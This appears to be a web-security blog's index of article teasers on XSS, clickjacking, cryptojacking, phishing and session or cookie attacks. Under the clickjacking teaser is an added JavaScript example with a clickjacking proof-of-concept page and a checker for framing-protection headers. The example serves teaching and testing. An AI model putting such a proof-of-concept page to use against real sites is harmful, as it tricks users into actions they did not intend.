Behind the Scenes of Onion Services

Tags: tor
In this article, we discuss how the domain names of services in the Tor network are set and what security risks they may pose. We examine a study from Princeton University on the habits of Tor users in order to determine the potential impact of these security risks. Onion ...
Transforming Self-XSS Into Exploitable XSS

Security researcher Brian Hyde was accepted into Synack Red Team's private bug bounty platform and discovered a reflected XSS vulnerability in one of its programs. The difficulties he faced in exploiting this cross-site scripting (XSS) vulnerability, and the workarounds he developed during his research, are highly informative and worth investigating ...
The End of CoinHive and the Rise of Cryptojacking

CoinHive was a service created in September 2017 that allowed website operators to mine the Monero cryptocurrency in visitors' browsers using JavaScript. Over its 18-month lifetime, CoinHive remarkably changed the income models of content developers. However, due in large part to the drop in hash rate (over 50%) ...
Sound Hijacking – Abusing Missing XFO

Tags: hijacking
A clickjacking attack works by loading the vulnerable website inside a near-transparent iframe on a malicious page and positioning it over an innocuous-looking button, checkbox or link. The user believes they are clicking the visible decoy, but the click lands on the invisible vulnerable page underneath. The user is thus tricked into clicking the apparently safe UI element, triggering a set ...
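As an added example (not code from the Netsparker article), the attacker-side layout described above, together with the check a tester would run to confirm the missing-XFO condition that makes it possible. The target URL, origins and the two constructed HTTP responses are illustrative assumptions, not data from the article.

```javascript
// Added example: clickjacking proof-of-concept page and a framing-protection
// check. All URLs, origins and response headers below are constructed.

// Attacker page: the target is loaded in an almost invisible iframe that sits
// on top (z-index 2) of a visible decoy button at the same coordinates, so a
// click on the "decoy" actually lands on the framed target page.
function buildClickjackPoc(targetUrl) {
  return `<!doctype html>
<html><body>
<button style="position:absolute;top:100px;left:100px;z-index:1">Play sound</button>
<iframe src="${targetUrl}"
        style="position:absolute;top:0;left:0;width:800px;height:600px;
               opacity:0.02;z-index:2;border:0"></iframe>
</body></html>`;
}

// Turn a raw HTTP response head into a map of lower-cased header names.
// The status line has no colon and is skipped; the value is split on the
// first colon only, so URLs inside header values survive intact.
function parseHeaders(raw) {
  const out = {};
  for (const line of raw.split(/\r?\n/)) {
    const i = line.indexOf(':');
    if (i > 0) out[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return out;
}

// Classify whether the response stops arbitrary origins from framing it.
// Returns 'blocked' (no framing at all), 'restricted' (same-origin or an
// allow-list) or 'unprotected' (the clickjacking precondition).
function framingProtection(headers) {
  const xfo = (headers['x-frame-options'] || '').trim().toLowerCase();
  const csp = headers['content-security-policy'] || '';
  // Browsers that support CSP frame-ancestors give it precedence over XFO.
  const m = /frame-ancestors\s+([^;]+)/i.exec(csp);
  if (m) {
    const sources = m[1].trim().toLowerCase().split(/\s+/);
    if (sources.includes("'none'")) return 'blocked';
    if (sources.includes('*')) return 'unprotected';
    return 'restricted'; // 'self' or an explicit origin allow-list
  }
  if (xfo === 'deny') return 'blocked';
  if (xfo === 'sameorigin') return 'restricted';
  // No header, an unknown value, or the obsolete ALLOW-FROM (ignored by
  // current browsers): the page can be framed from anywhere.
  return 'unprotected';
}

// Constructed sample responses for a vulnerable and a hardened target.
const vulnerableResponse = `HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=abc123; HttpOnly`;

const hardenedResponse = `HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'`;

function demo() {
  const verdicts = {
    vulnerable: framingProtection(parseHeaders(vulnerableResponse)),
    hardened: framingProtection(parseHeaders(hardenedResponse)),
  };
  if (verdicts.vulnerable === 'unprotected') {
    // Only the unprotected target is worth a PoC page.
    verdicts.poc = buildClickjackPoc('https://target.example/play');
  }
  return verdicts;
}
```

A 'restricted' verdict still deserves a look in a test: `frame-ancestors 'self'` protects against a third-party page, but any same-origin page with an HTML injection flaw can still frame the target.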
Brave Browser Sacrifices Security

Brave is a new, free and open-source web browser with a built-in ad blocker. It was developed by a team led by Brendan Eich, the inventor of JavaScript and a co-founder and former CTO of Mozilla. The Brave browser uses the motto 'You are not a product'. It focuses on improving the privacy and ...
Phishing by Open Graph Protocol

Tags: open-protocol, Phishing
The Open Graph Protocol (OGP) was introduced by Facebook in 2010 to give site owners control over how their links appear when shared on social media platforms. Whenever you click the Share button on Facebook, or other social media platforms, you interact with OGP technology that makes ...
Taking Remote Control of Computer Hardware

Remote Hardware Takeover via Vulnerable Admin Software

Increased digitization means that web browsers are integral to our daily lives. For example, I'm writing this article on a cloud-based word processing application, whereas a few years ago, I may only have had the option of using an executable desktop application. This growing capability means that the web will ...
Cross-Domain Cookie Manipulation

Cross Site Cookie Manipulation

Tags: cookie
For years, we have been told to keep the values of sensitive session cookies unpredictable and complex in order to prevent attacks such as session enumeration. And it made sense: if the session ID is long, complex and generated by a cryptographically secure random source, it is practically impossible for an attacker to guess it. However, from ...
Stealing Data with CSS Selectors and JavaScript

Acquiring Data with CSS Selectors and JavaScript in Time-Based Attacks

jQuery is a JavaScript library released in August 2006 with the motto 'write less, do more'. It simplifies writing JavaScript by making element selection, event chaining and event handling easier. It's safe to say that since the release of jQuery, a large number ...
Two Interesting Session-Related Vulnerabilities

Sessions are an essential part of most modern web applications, which is why session-related vulnerabilities often have a sizable impact on the overall security of a web application. They frequently allow the impersonation of other users and can have other dangerous side effects.

What Are Session Variables?

For those not ...